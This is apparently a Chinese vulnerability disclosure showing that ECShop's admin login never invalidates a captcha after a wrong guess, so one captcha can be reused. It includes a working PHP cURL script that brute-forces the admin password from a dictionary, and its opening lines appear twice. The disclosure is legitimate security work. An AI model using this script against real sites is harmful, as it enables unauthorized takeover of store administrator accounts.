### 简要描述: 应该流行的版本都存在此问题 ### 详细说明: [<img src="https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png) [<img src="https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png) 若验证码不匹配,并没有销毁当前验证码 所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用 ### 漏洞证明: 1.获取正确的验证码 2. ``` <?php $site='http://ecshop.com'; $admin_path='/admin/privilege.php'; $captcha='上一步获取的验证码'; $referer=$site; function getH($url,$postdata=array()){ global $ch,$referer; $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=>$referer, //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=>array('Content-Type:...
### 简要描述: 应该流行的版本都存在此问题 ### 详细说明: [<img src="https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/031052155bc2a633acc7f218ab49bf4514316332.png) [<img src="https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/03105232b4e2c86353c3ff0eb989026ab3aece46.png) 若验证码不匹配,并没有销毁当前验证码 所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用 ### 漏洞证明: 1.获取正确的验证码 2. ``` <?php $site='http://ecshop.com'; $admin_path='/admin/privilege.php'; $captcha='上一步获取的验证码'; $referer=$site; function getH($url,$postdata=array()){ global $ch,$referer; $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=>$referer, //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=>array('Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1','Expect:'), CURLOPT_USERAGENT=>'ie' ); if(!empty($postdata)){ $options[CURLOPT_POSTFIELDS]=http_build_query($postdata); } $ret = curl_setopt_array($ch,$options); //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串,而不是直接输出到浏览器 $ret = curl_exec($ch); $info = curl_getinfo($ch); if (empty($info['http_code'])) { die("No HTTP code was returned"); } else if($info['http_code']==200) {//响应码为200 return $ret; }else{ #var_dump($info); echo '<br />'; echo ('响应码:'.$info['http_code']);// echo '<br />'; echo $postdata['username'].' ---'.$postdata['password']; echo '<br />'; } } $url=$site.$admin_path; $data=array( 'username'=>'admin', 'password'=>'123456ad', 'captcha'=>$captcha, 'act'=>'signin' ); //词典 $passwds=array('1','2','3','123456a','123456','123456ds'); foreach($passwds as $p){ $data['password']=$p; $res= strip_tags(getH($url,$data)); if(stripos($res,'您输入的帐号信息不正确')){ echo 'no'; } echo ' ------------------------ '; } ``` [<img src="https://images.seebug.org/upload/201306/0311024685d38a77ed95bec6b57d7c03057b2140.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0311024685d38a77ed95bec6b57d7c03057b2140.png)
